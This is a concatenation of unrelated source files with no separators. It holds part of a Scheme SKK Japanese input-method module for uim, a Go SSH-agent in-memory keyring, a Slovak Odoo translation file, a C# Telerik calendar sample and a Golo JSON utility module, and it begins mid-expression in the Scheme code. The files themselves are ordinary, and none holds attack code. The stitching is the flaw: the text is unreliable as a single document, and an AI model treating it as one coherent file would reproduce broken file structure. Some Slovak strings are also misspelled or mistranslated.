skk-use-numeric-conversion?))
(im-activate-candidate-selector
sc
(cond
((eq? skk-candidate-selection-style 'uim)
(skk-context-nr-candidates sc))
((eq? skk-candidate-selection-style 'ddskk-like)
(- (skk-context-nr-candidates sc)
(- skk-candidate-op-count 1))))
skk-nr-candidate-max)))))
(define skk-commit-by-label-key
(lambda (sc key)
(let ((nr (skk-context-nr-candidates sc))
(cur-page (if (= skk-nr-candidate-max 0)
0
(cond
((eq? skk-candidate-selection-style 'uim)
(quotient (skk-context-nth sc)
skk-nr-candidate-max))
((eq? skk-candidate-selection-style 'ddskk-like)
(quotient (- (skk-context-nth sc)
(- skk-candidate-op-count 1))
skk-nr-candidate-max)))))
(idx -1)
(res #f))
(cond
((eq? skk-candidate-selection-style 'uim)
(let ((num (- (length skk-uim-heading-label-char-list)
(length
(member (charcode->string key)
skk-uim-heading-label-char-list)))))
(if (or (< num skk-nr-candidate-max)
(= skk-nr-candidate-max 0))
(set! idx (+ (* cur-page skk-nr-candidate-max) num)))))
((eq? skk-candidate-selection-style 'ddskk-like)
(let ((num (- (length skk-ddskk-like-heading-label-char-list)
(length
(member (charcode->string key)
skk-ddskk-like-heading-label-char-list)))))
(if (or (< num skk-nr-candidate-max)
(= skk-nr-candidate-max 0))
(set! idx (+ (* cur-page skk-nr-candidate-max)
num (- skk-candidate-op-count 1)))))))
(if (and (>= idx 0)
(< idx nr))
(begin
(skk-context-set-nth! sc idx)
(set! res (skk-prepare-commit-string sc))))
res)))
(define skk-incr-candidate-index
(lambda (sc)
(cond
((eq? skk-candidate-selection-style 'uim)
(skk-context-set-nth! sc (+ 1 (skk-context-nth sc))))
((eq? skk-candidate-selection-style 'ddskk-like)
(if (> (+ (skk-context-nth sc) 1) (- skk-candidate-op-count 1))
(if (> (+ (skk-context-nth sc) skk-nr-candidate-max)
(- (skk-context-nr-candidates sc) 1))
;; go into recursive learning state
(skk-context-set-nth! sc (skk-context-nr-candidates sc))
;; just shift to next page
(im-shift-page-candidate sc #t))
           ;; just increment the index unless the candidate window exists
(skk-context-set-nth! sc (+ 1 (skk-context-nth sc))))))
(skk-context-set-candidate-op-count!
sc
(+ 1 (skk-context-candidate-op-count sc)))
#t))
(define skk-decr-candidate-index
(lambda (sc)
(cond
((eq? skk-candidate-selection-style 'uim)
(if (> (skk-context-nth sc) 0)
(begin
(skk-context-set-nth! sc (- (skk-context-nth sc) 1))
#t)
(begin
(if (= (skk-context-nr-candidates sc) 0)
(begin
(skk-back-to-kanji-state sc)
#f)
(begin
(skk-context-set-nth!
sc
(- (skk-context-nr-candidates sc) 1))
#t)))))
((eq? skk-candidate-selection-style 'ddskk-like)
(if (> (skk-context-nth sc)
(+ skk-nr-candidate-max (- skk-candidate-op-count 2)))
(begin
(im-shift-page-candidate sc #f)
#t)
(if (= (skk-context-nth sc) 0)
(begin
(skk-back-to-kanji-state sc)
#f)
(begin
(if (> (skk-context-nth sc) (- skk-candidate-op-count 2))
(begin
(skk-reset-candidate-window sc)
(skk-context-set-nth! sc
(- skk-candidate-op-count 1))))
(skk-context-set-nth! sc (- (skk-context-nth sc) 1))
#t)))))))
(define skk-change-candidate-index
(lambda (sc incr)
(let ((head (skk-context-head sc)))
(and
(if incr
(skk-incr-candidate-index sc)
(skk-decr-candidate-index sc))
(if (null? (skk-get-current-candidate sc))
(begin
(skk-context-set-nth! sc 0)
(if skk-use-recursive-learning?
(begin
(skk-reset-candidate-window sc)
(skk-setup-child-context sc skk-child-type-editor)))
#t)
#t)
(if (null? (skk-context-child-context sc))
(begin
           ;; decide whether to start showing the candidate window
(skk-check-candidate-window-begin sc)
;;
(if (skk-context-candidate-window sc)
(cond
((eq? skk-candidate-selection-style 'uim)
(im-select-candidate sc (skk-context-nth sc)))
((eq? skk-candidate-selection-style 'ddskk-like)
(im-select-candidate
sc
(- (skk-context-nth sc) (- skk-candidate-op-count 1))))))
#t)
#t))
#f)))
(define skk-reset-candidate-window
(lambda (sc)
(if (skk-context-candidate-window sc)
(begin
(im-deactivate-candidate-selector sc)
(skk-context-set-candidate-window! sc #f)))
(skk-context-set-candidate-op-count! sc 0)))
(define skk-back-to-kanji-state
(lambda (sc)
(skk-reset-candidate-window sc)
(skk-context-set-state! sc 'skk-state-kanji)
(skk-context-set-okuri-head! sc "")
(if (not (null? (skk-context-okuri sc)))
(begin
(skk-context-set-head! sc
(append (skk-context-okuri sc)
(skk-context-head sc)))
(skk-reset-dcomp-word sc)))
(if (not (null? (skk-context-appendix sc)))
(begin
(skk-context-set-head! sc
(append (skk-context-appendix sc)
(skk-context-head sc)))
(skk-reset-dcomp-word sc)))
(skk-context-set-okuri! sc '())
(skk-context-set-appendix! sc '())
;; don't clear dcomp (not compatible with ddskk's behavior)
;;(skk-reset-dcomp-word sc )
(skk-context-set-nr-candidates! sc 0)))
(define skk-back-to-converting-state
(lambda (sc)
(skk-context-set-nth! sc (- (skk-context-nr-candidates sc) 1))
(skk-check-candidate-window-begin sc)
(if (skk-context-candidate-window sc)
(cond
((eq? skk-candidate-selection-style 'uim)
(im-select-candidate sc (skk-context-nth sc)))
((eq? skk-candidate-selection-style 'ddskk-like)
(im-select-candidate
sc
(- (skk-context-nth sc) (- skk-candidate-op-count 1))))))
(skk-context-set-state! sc 'skk-state-converting)))
(define skk-change-completion-index
(lambda (sc incr)
(if incr
(begin
(if (> (- (skk-lib-get-nr-completions
skk-dic
(skk-make-string (skk-context-head sc) skk-type-hiragana)
skk-use-numeric-conversion?
skk-use-look?)
1)
(skk-context-completion-nth sc))
(skk-context-set-completion-nth!
sc
(+ 1 (skk-context-completion-nth sc)))))
(begin
(if (> (skk-context-completion-nth sc) 0)
(skk-context-set-completion-nth!
sc
(- (skk-context-completion-nth sc) 1)))))
#f))
(define find-kana-list-from-rule
(lambda (rule str)
(if (not (null? rule))
(if (pair? (member str (car (cdr (car rule)))))
(car (cdr (car rule)))
(find-kana-list-from-rule (cdr rule) str))
(list str str str))))
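;; For instance, with the standard rule table the kana triple is looked up by
;; membership, while a string absent from the table falls back to a triple of
;; itself (the second call assumes "abc" is not an output of any rule):
;;   (find-kana-list-from-rule ja-rk-rule-basic "か")  => ("か" "カ" "ｶ")
;;   (find-kana-list-from-rule ja-rk-rule-basic "abc") => ("abc" "abc" "abc")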
(define skk-string-list-to-context-head
(lambda (sc sl)
(skk-context-set-head! sc '())
(skk-append-string-list-to-context-head sc sl)))
(define skk-append-string-list-to-context-head
(lambda (sc sl)
(let ((append-list-to-context-head
(lambda (sc sl)
(skk-context-set-head! sc (append (skk-context-head sc)
(list sl))))))
(if (not (null? sl))
(begin
(append-list-to-context-head
sc
(if (or
(skk-context-latin-conv sc)
;; handle Setsubi-ji and Settou-ji
(string=? ">" (car sl))
(and
skk-use-numeric-conversion?
(string=? "#" (car sl))))
(list (car sl) (car sl) (car sl))
(find-kana-list-from-rule ja-rk-rule-basic (car sl))))
(skk-append-string-list-to-context-head sc (cdr sl)))
#f))))
(define skk-proc-state-completion
(lambda (c key key-state)
(let ((sc (skk-find-descendant-context c)))
(and
(if (skk-next-completion-key? key key-state)
(skk-change-completion-index sc #t)
#t)
(if (skk-prev-completion-key? key key-state)
(skk-change-completion-index sc #f)
#t)
(if (skk-new-completion-from-current-comp-key? key key-state)
(let* ((comp (skk-get-current-completion sc))
(sl (string-to-list comp)))
(if (not (null? sl))
(begin (skk-lib-get-completion
skk-dic
(skk-get-current-completion sc)
skk-use-numeric-conversion?
skk-use-look?)))
(skk-lib-clear-completions
(skk-make-string
(skk-context-head sc)
skk-type-hiragana)
skk-use-numeric-conversion?)
(if (not (null? sl))
(skk-string-list-to-context-head sc sl))
(skk-context-set-completion-nth! sc 0)
(if skk-dcomp-activate?
(skk-context-set-dcomp-word!
sc
(skk-get-current-completion sc)))
#f)
#t)
(if (skk-cancel-key? key key-state)
(begin
(skk-lib-clear-completions
(skk-make-string (skk-context-head sc) skk-type-hiragana)
skk-use-numeric-conversion?)
(skk-context-set-state! sc 'skk-state-kanji)
;; don't clear dcomp (not compatible with ddskk's behavior)
;;(skk-reset-dcomp-word sc)
#f)
#t)
(let ((sl (string-to-list (skk-get-current-completion sc))))
(skk-lib-clear-completions
(skk-make-string (skk-context-head sc) (skk-context-kana-mode sc))
skk-use-numeric-conversion?)
(if (not (null? sl))
(skk-string-list-to-context-head sc sl))
(skk-reset-dcomp-word sc)
(skk-context-set-state! sc 'skk-state-kanji)
(skk-proc-state-kanji c key key-state)))
#f)))
(define skk-heading-label-char?
(lambda (key)
(cond
((eq? skk-candidate-selection-style 'uim)
(if (member (charcode->string key)
skk-uim-heading-label-char-list)
#t
#f))
((eq? skk-candidate-selection-style 'ddskk-like)
(if (member (charcode->string key)
skk-ddskk-like-heading-label-char-list)
#t
#f)))))
(define skk-proc-state-converting
(lambda (c key key-state)
(let ((sc (skk-find-descendant-context c))
(res #f))
(and
(if (skk-next-candidate-key? key key-state)
(skk-change-candidate-index sc #t)
#t)
(if (skk-prev-candidate-key? key key-state)
(skk-change-candidate-index sc #f)
#t)
(if (skk-cancel-key? key key-state)
(begin
;; back to kanji state
(skk-back-to-kanji-state sc)
#f)
#t)
(if (skk-next-page-key? key key-state)
(begin
(if (skk-context-candidate-window sc)
(im-shift-page-candidate sc #t))
#f)
#t)
(if (skk-prev-page-key? key key-state)
(begin
(if (skk-context-candidate-window sc)
(im-shift-page-candidate sc #f))
#f)
#t)
(if (or
(skk-commit-key? key key-state)
(skk-return-key? key key-state))
(begin
(set! res (skk-prepare-commit-string sc))
(if (skk-return-key? key key-state)
(begin
(skk-commit sc res)
(set! res #f)
(if (not skk-egg-like-newline?)
(if skk-commit-newline-explicitly?
(skk-commit sc "\n")
(begin
(skk-update-preedit sc)
(skk-proc-state-direct c key key-state))))))
#f)
#t)
(if (and skk-commit-candidate-by-label-key?
(skk-heading-label-char? key)
(skk-context-candidate-window sc))
(begin
(set! res (skk-commit-by-label-key sc key))
(if res
#f
#t))
#t)
(if (skk-purge-candidate-key? key key-state)
(if (not
(and (eq? skk-candidate-selection-style 'ddskk-like)
(skk-context-candidate-window sc)))
(begin
(skk-reset-candidate-window sc)
(skk-setup-child-context sc skk-child-type-dialog)
#f))
#t)
(begin
(skk-context-set-state! sc 'skk-state-direct)
(set! res (skk-prepare-commit-string sc))
(skk-commit sc res)
(skk-update-preedit sc)
;; handle Setsubi-ji
(if (skk-special-midashi-key? key key-state)
(begin
(skk-context-set-state! sc 'skk-state-kanji)
(skk-append-string sc '(">" ">" ">"))
(set! res #f))
(set! res (skk-proc-state-direct c key key-state)))))
res)))
(define skk-proc-state-okuri
(lambda (c key key-state)
(let* ((sc (skk-find-descendant-context c))
(rkc (skk-context-rk-context sc))
(res #f))
(and
(if (skk-cancel-key? key key-state)
(begin
(rk-flush rkc)
(skk-back-to-kanji-state sc)
#f)
#t)
(if (skk-backspace-key? key key-state)
(begin
(rk-backspace rkc)
(skk-back-to-kanji-state sc)
#f)
#t)
       ;; committing an incomplete head: behavior conforms to ddskk
(if (or
(skk-commit-key? key key-state)
(skk-return-key? key key-state))
(begin
(skk-commit sc (skk-make-string
(skk-context-head sc)
(skk-context-kana-mode sc)))
(skk-flush sc)
(if (skk-return-key? key key-state)
(begin
(skk-update-preedit sc)
(skk-proc-state-direct c key key-state)))
#f)
#t)
(begin
(if (string=? (skk-context-okuri-head sc) "")
(if (skk-rk-pending? sc)
(skk-context-set-okuri-head-using-alist!
sc
(car (reverse (rk-context-seq rkc))))
(skk-context-set-okuri-head-using-alist!
sc
(charcode->string (skk-ichar-downcase key)))))
(set! res
(rk-push-key!
rkc
(charcode->string (skk-ichar-downcase key))))
(if (and res
(or
(list? (car res))
(not (string=? (car res) ""))))
(begin
(skk-append-okuri-string sc res)
(if (not (skk-rk-pending? sc))
(skk-begin-conversion sc)))
(begin
(if (= (length (rk-context-seq rkc)) 1)
(skk-context-set-okuri-head-using-alist! sc (charcode->string key)))))))
#f)))
(define skk-proc-state-latin
(lambda (c key key-state)
(let ((sc (skk-find-descendant-context c)))
(if
(skk-on-key? key key-state)
(begin
(skk-context-set-state! sc 'skk-state-direct)
(skk-context-set-kana-mode! sc skk-type-hiragana))
(skk-commit-raw sc key key-state))
#f)))
(define skk-proc-state-wide-latin
(lambda (c key key-state)
(let* ((char (charcode->string key))
(w (if (symbol? key) #f (ja-wide char)))
(sc (skk-find-descendant-context c)))
(if skk-use-with-vi?
(if (skk-vi-escape-key? key key-state)
(skk-context-set-state! sc 'skk-state-latin)))
(cond
((skk-on-key? key key-state)
(skk-flush sc)
(skk-context-set-state! sc 'skk-state-direct)
(skk-context-set-kana-mode! sc skk-type-hiragana))
((and (modifier-key-mask key-state)
(not (shift-key-mask key-state)))
(skk-commit-raw sc key key-state))
(w
(skk-commit sc w))
(else
(skk-commit-raw sc key key-state)))
#f)))
(define skk-proc-state-kcode
(lambda (c key key-state)
(let ((sc (skk-find-descendant-context c)))
(and
(if (skk-cancel-key? key key-state)
(begin
(skk-flush sc)
#f)
#t)
(if (skk-backspace-key? key key-state)
(begin
(if (> (length (skk-context-head sc)) 0)
(skk-context-set-head! sc (cdr (skk-context-head sc)))
(skk-flush sc))
#f)
#t)
(if (or
(skk-commit-key? key key-state)
(skk-return-key? key key-state))
(begin
(if (> (length (skk-context-head sc)) 0)
(let* ((str-list (string-to-list
(skk-make-string
(skk-context-head sc)
(skk-context-kana-mode sc))))
(kanji (ja-kanji-code-input str-list)))
(if (and kanji (> (string-length kanji) 0))
(begin
(skk-commit sc kanji)
(skk-flush sc))))
(skk-flush sc))
#f)
#t)
;; append latin string
(if (ichar-graphic? key)
(let* ((s (charcode->string key))
(p (cons s (cons s (cons s s)))))
(skk-append-string sc p)
#f)
#t))
#f)))
(define skk-push-key
(lambda (c key key-state)
(let* ((sc (skk-find-descendant-context c))
(state (skk-context-state sc))
(fun (cond
((eq? state 'skk-state-direct)
skk-proc-state-direct)
((eq? state 'skk-state-kanji)
skk-proc-state-kanji)
((eq? state 'skk-state-completion)
skk-proc-state-completion)
((eq? state 'skk-state-converting)
skk-proc-state-converting)
((eq? state 'skk-state-okuri)
skk-proc-state-okuri)
((eq? state 'skk-state-latin)
skk-proc-state-latin)
((eq? state 'skk-state-wide-latin)
skk-proc-state-wide-latin)
((eq? state 'skk-state-kcode)
skk-proc-state-kcode)))
(res (fun c key key-state)))
(if res
(skk-commit sc res))
(skk-update-preedit sc))))
(define skk-init-handler
(lambda (id im arg)
(let ((sc (skk-context-new id im)))
(update-style skk-style-spec (symbol-value skk-style))
(set! skk-context-list (cons sc skk-context-list))
sc)))
(define skk-release-handler
(lambda (sc)
(skk-save-personal-dictionary)
(set! skk-context-list (delete! sc skk-context-list))
(if (null? skk-context-list)
(begin
(skk-lib-look-close)
(skk-lib-free-dic skk-dic)
(set! skk-dic #f)))))
(define skk-press-key-handler
(lambda (sc key state)
(if (ichar-control? key)
(im-commit-raw sc)
(skk-push-key sc key state))))
(define skk-release-key-handler
(lambda (c key state)
(let* ((sc (skk-find-descendant-context c))
(state (skk-context-state sc)))
(if (eq? state 'skk-state-latin)
;; don't discard key release event for apps
(begin
(skk-context-set-commit-raw! sc #f)
(im-commit-raw sc))))))
(define skk-reset-handler
(lambda (sc)
(skk-flush sc)))
(define skk-get-candidate-with-okuri
(lambda (cand okuri)
(let ((pos (string-contains cand ";" 0)))
(if pos
(string-append
(substring cand 0 pos)
(skk-make-string okuri skk-type-hiragana)
(substring cand pos (string-length cand)))
(string-append
cand
(skk-make-string okuri skk-type-hiragana))))))
(define skk-get-candidate-handler
(lambda (sc idx accel-enum-hint)
(let* ((dcsc (skk-find-descendant-context sc))
(cand (skk-lib-eval-candidate
(skk-get-nth-candidate
dcsc
(cond
((eq? skk-candidate-selection-style 'uim)
idx)
((eq? skk-candidate-selection-style 'ddskk-like)
(+ idx (- skk-candidate-op-count 1)))))))
(okuri (skk-context-okuri dcsc)))
(list
(if (and
(not (null? okuri))
skk-show-candidates-with-okuri?)
(skk-get-candidate-with-okuri cand okuri)
cand)
(cond
((eq? skk-candidate-selection-style 'uim)
(if (= skk-nr-candidate-max 0)
(digit->string (+ idx 1))
(begin
(set! idx (remainder idx skk-nr-candidate-max))
(if (< idx (length skk-uim-heading-label-char-list))
(charcode->string
(ichar-upcase
(string->charcode
(nth idx skk-uim-heading-label-char-list))))
""))))
((eq? skk-candidate-selection-style 'ddskk-like)
(if (> skk-nr-candidate-max 0)
(set! idx (remainder idx skk-nr-candidate-max)))
(if (< idx (length skk-ddskk-like-heading-label-char-list))
(charcode->string
(ichar-upcase
(string->charcode
(nth idx skk-ddskk-like-heading-label-char-list))))
"")))
""))))
(define skk-set-candidate-index-handler
(lambda (c idx)
(let ((sc (skk-find-descendant-context c)))
(if (skk-context-candidate-window sc)
(begin
(cond
((eq? skk-candidate-selection-style 'uim)
(skk-context-set-nth! sc idx))
((eq? skk-candidate-selection-style 'ddskk-like)
(skk-context-set-nth! sc (+ idx (- skk-candidate-op-count 1)))))
(skk-update-preedit sc))))))
(skk-configure-widgets)
(register-im
'skk
"ja"
"EUC-JP"
skk-im-name-label
skk-im-short-desc
#f
skk-init-handler
skk-release-handler
context-mode-handler
skk-press-key-handler
skk-release-key-handler
skk-reset-handler
skk-get-candidate-handler
skk-set-candidate-index-handler
context-prop-activate-handler
#f
#f
#f
#f
#f
)
// Copyright 2014 The Go Authors. All rights reserved.
// Use of this source code is governed by a BSD-style
// license that can be found in the LICENSE file.
package agent
import (
"bytes"
"crypto/rand"
"crypto/subtle"
"errors"
"fmt"
"sync"
"time"
"golang.org/x/crypto/ssh"
)
type privKey struct {
signer ssh.Signer
comment string
expire *time.Time
}
type keyring struct {
mu sync.Mutex
keys []privKey
locked bool
passphrase []byte
}
var errLocked = errors.New("agent: locked")
// NewKeyring returns an Agent that holds keys in memory. It is safe
// for concurrent use by multiple goroutines.
func NewKeyring() Agent {
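	// A minimal usage sketch of the returned keyring (illustrative only:
	// error handling is elided and privateKey is assumed to hold a parsed
	// key, e.g. the result of ssh.ParseRawPrivateKey):
	//
	//	kr := NewKeyring()
	//	_ = kr.Add(AddedKey{PrivateKey: privateKey, Comment: "demo", LifetimeSecs: 60})
	//	ids, _ := kr.List()                          // one identity, expiring in 60s
	//	sig, _ := kr.Sign(ids[0], []byte("payload")) // *Key satisfies ssh.PublicKey
	//	_ = sig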
return &keyring{}
}
// RemoveAll removes all identities.
func (r *keyring) RemoveAll() error {
r.mu.Lock()
defer r.mu.Unlock()
if r.locked {
return errLocked
}
r.keys = nil
return nil
}
// removeLocked does the actual key removal. The caller must already be holding the
// keyring mutex.
func (r *keyring) removeLocked(want []byte) error {
found := false
for i := 0; i < len(r.keys); {
if bytes.Equal(r.keys[i].signer.PublicKey().Marshal(), want) {
found = true
r.keys[i] = r.keys[len(r.keys)-1]
r.keys = r.keys[:len(r.keys)-1]
continue
} else {
i++
}
}
if !found {
return errors.New("agent: key not found")
}
return nil
}
// Remove removes all identities with the given public key.
func (r *keyring) Remove(key ssh.PublicKey) error {
r.mu.Lock()
defer r.mu.Unlock()
if r.locked {
return errLocked
}
return r.removeLocked(key.Marshal())
}
// Lock locks the agent. Sign and Remove will fail, and List will return an empty list.
func (r *keyring) Lock(passphrase []byte) error {
r.mu.Lock()
defer r.mu.Unlock()
if r.locked {
return errLocked
}
r.locked = true
r.passphrase = passphrase
return nil
}
// Unlock undoes the effect of Lock
func (r *keyring) Unlock(passphrase []byte) error {
r.mu.Lock()
defer r.mu.Unlock()
if !r.locked {
return errors.New("agent: not locked")
}
if len(passphrase) != len(r.passphrase) || 1 != subtle.ConstantTimeCompare(passphrase, r.passphrase) {
return fmt.Errorf("agent: incorrect passphrase")
}
r.locked = false
r.passphrase = nil
return nil
}
// expireKeysLocked removes expired keys from the keyring. If a key was added
// with a lifetimesecs constraint and that many seconds have elapsed, it is
// removed. The caller *must* be holding the keyring mutex.
func (r *keyring) expireKeysLocked() {
for _, k := range r.keys {
if k.expire != nil && time.Now().After(*k.expire) {
r.removeLocked(k.signer.PublicKey().Marshal())
}
}
}
// List returns the identities known to the agent.
func (r *keyring) List() ([]*Key, error) {
r.mu.Lock()
defer r.mu.Unlock()
if r.locked {
// section 2.7: locked agents return empty.
return nil, nil
}
r.expireKeysLocked()
var ids []*Key
for _, k := range r.keys {
pub := k.signer.PublicKey()
ids = append(ids, &Key{
Format: pub.Type(),
Blob: pub.Marshal(),
Comment: k.comment})
}
return ids, nil
}
// Add adds a private key to the keyring. If a certificate
// is given, that certificate is added as the public key. Apart from
// the key lifetime (LifetimeSecs), any other constraints are ignored.
func (r *keyring) Add(key AddedKey) error {
r.mu.Lock()
defer r.mu.Unlock()
if r.locked {
return errLocked
}
signer, err := ssh.NewSignerFromKey(key.PrivateKey)
if err != nil {
return err
}
if cert := key.Certificate; cert != nil {
signer, err = ssh.NewCertSigner(cert, signer)
if err != nil {
return err
}
}
p := privKey{
signer: signer,
comment: key.Comment,
}
if key.LifetimeSecs > 0 {
t := time.Now().Add(time.Duration(key.LifetimeSecs) * time.Second)
p.expire = &t
}
r.keys = append(r.keys, p)
return nil
}
// Sign returns a signature for the data.
func (r *keyring) Sign(key ssh.PublicKey, data []byte) (*ssh.Signature, error) {
r.mu.Lock()
defer r.mu.Unlock()
if r.locked {
return nil, errLocked
}
r.expireKeysLocked()
wanted := key.Marshal()
for _, k := range r.keys {
if bytes.Equal(k.signer.PublicKey().Marshal(), wanted) {
return k.signer.Sign(rand.Reader, data)
}
}
return nil, errors.New("not found")
}
// Signers returns signers for all the known keys.
func (r *keyring) Signers() ([]ssh.Signer, error) {
r.mu.Lock()
defer r.mu.Unlock()
if r.locked {
return nil, errLocked
}
r.expireKeysLocked()
s := make([]ssh.Signer, 0, len(r.keys))
for _, k := range r.keys {
s = append(s, k.signer)
}
return s, nil
}
# Translation of Odoo Server.
# This file contains the translation of the following modules:
# * website_customer
#
# Translators:
msgid ""
msgstr ""
"Project-Id-Version: Odoo 8.0\n"
"Report-Msgid-Bugs-To: \n"
"POT-Creation-Date: 2015-01-21 14:08+0000\n"
"PO-Revision-Date: 2016-04-13 09:40+0000\n"
"Last-Translator: Martin Trigaux\n"
"Language-Team: Slovak (http://www.transifex.com/odoo/odoo-8/language/sk/)\n"
"MIME-Version: 1.0\n"
"Content-Type: text/plain; charset=UTF-8\n"
"Content-Transfer-Encoding: \n"
"Language: sk\n"
"Plural-Forms: nplurals=3; plural=(n==1) ? 0 : (n>=2 && n<=4) ? 1 : 2;\n"
#. module: website_customer
#: code:addons/website_customer/controllers/main.py:55
#, python-format
msgid "All Countries"
msgstr "Všetky krajiny"
#. module: website_customer
#: view:website:website_customer.implemented_by_block
msgid "Implemented By"
msgstr "Implementoval"
#. module: website_customer
#: view:website:website_customer.index
msgid "No result found"
msgstr "Výsledok nenájedný"
#. module: website_customer
#: view:website:website.layout view:website:website_customer.details
#: view:website:website_customer.index
msgid "Our References"
msgstr "Naše referencie"
#. module: website_customer
#: view:website:website_customer.references_block
msgid "References"
msgstr "Ďalšie zdroje"
#. module: website_customer
#: view:website:website_customer.index
msgid "References by Country"
msgstr "Referencie podľa krajiny"
#. module: website_customer
#: view:website:website_customer.index
msgid "Search"
msgstr "Hľadanie"
#. module: website_customer
#: view:website:website_customer.index
msgid "Trusted by millions worldwide"
msgstr "Preverené miliónmi po celom svete"
#. module: website_customer
#: view:website:website_customer.index
msgid "World Map"
msgstr "Mapa sveta"
#. module: website_customer
#: view:website:website_customer.implemented_by_block
msgid "reference(s))"
msgstr "referencia(e)"
using System;
using System.Collections.Generic;
using Android.Views;
using Android.OS;
using Com.Telerik.Widget.Calendar;
using Android.Content;
using Android.Widget;
using Com.Telerik.Widget.Calendar.Events;
using Java.Util;
namespace Samples
{
public class EventAllDayFragment : Android.Support.V4.App.Fragment, ExampleFragment
{
public override View OnCreateView (LayoutInflater inflater, ViewGroup container, Bundle savedInstanceState)
{
RadCalendarView calendarView = new RadCalendarView (Activity);
Calendar calendar = Java.Util.Calendar.Instance;
long start = calendar.TimeInMillis;
calendar.Add (CalendarField.Hour, 3);
long end = calendar.TimeInMillis;
Event allDayEvent = new Event ("Enjoy Life", start, end);
allDayEvent.AllDay = true;
IList<Event> events = new List<Event> ();
events.Add (allDayEvent);
calendarView.EventAdapter.Events = events;
return calendarView;
}
public String Title() {
return "All day event";
}
}
}
# ............................................................................................... #
#
# Copyright (c) 2012-2020 Institut National des Sciences Appliquées de Lyon (INSA Lyon) and others
#
# This program and the accompanying materials are made available under the
# terms of the Eclipse Public License 2.0 which is available at
# http://www.eclipse.org/legal/epl-2.0.
#
# SPDX-License-Identifier: EPL-2.0
#
# ............................................................................................... #
----
A set of useful APIs for dealing with JSON documents from Golo.
The implementation is backed by [json-simple](https://code.google.com/p/json-simple/). While
`json-simple` only supports encoding from lists and maps, this API brings support for sets, arrays,
Golo tuples, dynamic objects and structs.
----
module gololang.JSON
# ............................................................................................... #
----
Takes any known object and gives a JSON string representation:
let data = map[
["name", "Somebody"],
["age", 69],
["friends", list[
"Mr Bean", "John B", "Larry"
]]
]
let asText = JSON.stringify(data)
`obj` may be a list, an array, a set, a map, a tuple, a dynamic object or a struct. If `obj` is of
another type, its string representation is given by `obj: toString()`, or `"null"` if
`obj` is `null`.
----
function stringify = |obj| {
let res = stringify_walk(obj)
if (res is null) {
return "null"
} else {
return res: toString()
}
}
local function isSeq = |obj| ->
(obj oftype java.util.List.class) or
(obj oftype java.util.Set.class) or
(obj oftype gololang.Tuple.class) or
(isArray(obj))
local function stringify_walk = |obj| {
if obj oftype java.util.Map.class {
let json = org.json.simple.JSONObject()
foreach key in obj: keySet() {
json: put(key, stringify_walk(obj: get(key)))
}
return json
} else if isSeq(obj) {
let json = org.json.simple.JSONArray()
foreach value in obj {
json: add(stringify_walk(value))
}
return json
} else if obj oftype gololang.DynamicObject.class {
let json = org.json.simple.JSONObject()
foreach prop in obj: properties() {
let value = prop: getValue()
if not(isClosure(value)) {
json: put(prop: getKey(), stringify_walk(value))
}
}
return json
} else if (obj oftype gololang.GoloStruct.class) {
let json = org.json.simple.JSONObject()
foreach member in obj: members() {
json: put(member, stringify_walk(obj: get(member)))
}
return json
}
return obj
}
----
Parses a JSON string and gives an object representation as a list or map collection:
let data = JSON.parse(text)
println(data: get("name"))
----
function parse = |str| -> org.json.simple.JSONValue.parseWithException(str)
# ............................................................................................... #
----
Provides a mixin for dynamic objects that includes a `toJSON()` method:
object: mixin(JSON.dynamicObjectMixin()): toJSON()
which is equivalent to:
JSON.stringify(object)
----
function dynamicObjectMixin = ->
DynamicObject(): define("toJSON", |this| -> stringify(this))
----
Returns a new dynamic object from a JSON string where each first-level entry is mapped into the
dynamic object:
let obj = JSON.toDynamicObject(JSON.stringify(map[
["a", "1"], ["b", "2"]
]))
println(obj: a())
println(obj: b())
----
function toDynamicObject = |str| {
let obj = DynamicObject()
let map = parse(str)
foreach key in map: keySet() {
obj: define(key, map: get(key))
}
return obj
}
----
Returns a new dynamic object from a JSONObject where each level entry is mapped into the
dynamic object or an array of dynamic objects.
----
local function toDynamicObjectFromJSONObject = |obj| {
let isJSONObject = |obj| -> obj oftype org.json.simple.JSONObject.class
let isJSONArray = |obj| -> obj oftype org.json.simple.JSONArray.class
let parse_object = |level, obj, dyno| {
let parseMembers = |obj, dyno| {
obj: each(|key, value| {
dyno: define(key, value)
parse_object(key, value, dyno)
})
}
if isJSONObject(obj) {
if level is null { # root
parseMembers(obj, dyno)
} else {
dyno: define(level, DynamicObject())
parseMembers(obj, dyno: get(level))
}
} else if isJSONArray(obj) {
dyno: define(level, list[])
obj: each(|item| {
if isJSONObject(item) is false and isJSONArray(item) is false {
dyno: get(level): append(item)
} else if isJSONObject(item) {
let subDyno = DynamicObject()
parseMembers(item, subDyno)
dyno: get(level): append(subDyno)
}
})
}
return dyno
}
return parse_object(null, obj, DynamicObject())
}
----
Returns a list of dynamic objects from a JSONArray where each level entry is mapped into the
dynamic object or an array of dynamic objects.
----
local function toDynamicObjectsListFromJSONArray = |arr| -> arr: map(|obj| -> toDynamicObjectFromJSONObject(obj))
----
Returns a new dynamic object from a JSON string where each level entry is mapped into the
dynamic object or an array of dynamic objects:
let obj = JSON.toDynamicObjectFromJSONString("""
{
"id":"bob",
"friends":[
{"name":"sam"}, {"name":"jane"}, {"name":"john"}
],
"address": {
"street":"20 Avenue Albert Einstein",
"city":"Villeurbanne",
"zip":"69100",
"country":"France"
}
}
""")
obj: friends(): get(2): name(): equals("john") # true
obj: address(): city(): equals("Villeurbanne") # true
----
function toDynamicObjectFromJSONString = |str| -> toDynamicObjectFromJSONObject(parse(str))
----
Returns a list of dynamic objects from a JSON string where each level entry is mapped into the
dynamic object or an array of dynamic objects:
let objects = JSON.toDynamicObjectsListFromJSONString("""[
{"message":"hello"},
{
"id":"bob",
"friends":[
{"name":"sam"}, {"name":"jane"}, {"name":"john"}
],
"address": {
"street":"20 Avenue Albert Einstein",
"city":"Villeurbanne",
"zip":"69100",
"country":"France"
}
}
]""")
println(objects: get(1): friends(): get(2): name(): equals("john")) # true
println(objects: get(1): address(): city(): equals("Villeurbanne")) # true
----
function toDynamicObjectsListFromJSONString = |str| -> toDynamicObjectsListFromJSONArray(parse(str))
----
Returns a new dynamic object from a map where each level entry is mapped into the
dynamic object or an array of dynamic objects:
let obj = JSON.toDynamicObjectFromMap(map[
["id", "bob"],
["friends", [
map[["name", "sam"]],
map[["name", "jane"]],
map[["name", "john"]]
]],
["address", map[
["street", "20 Avenue Albert Einstein"],
["city", "Villeurbanne"],
["zip", "69100"],
["country", "France"]
]]
])
println(obj: friends(): get(2): name(): equals("john")) # true
println(obj: address(): city(): equals("Villeurbanne")) # true
----
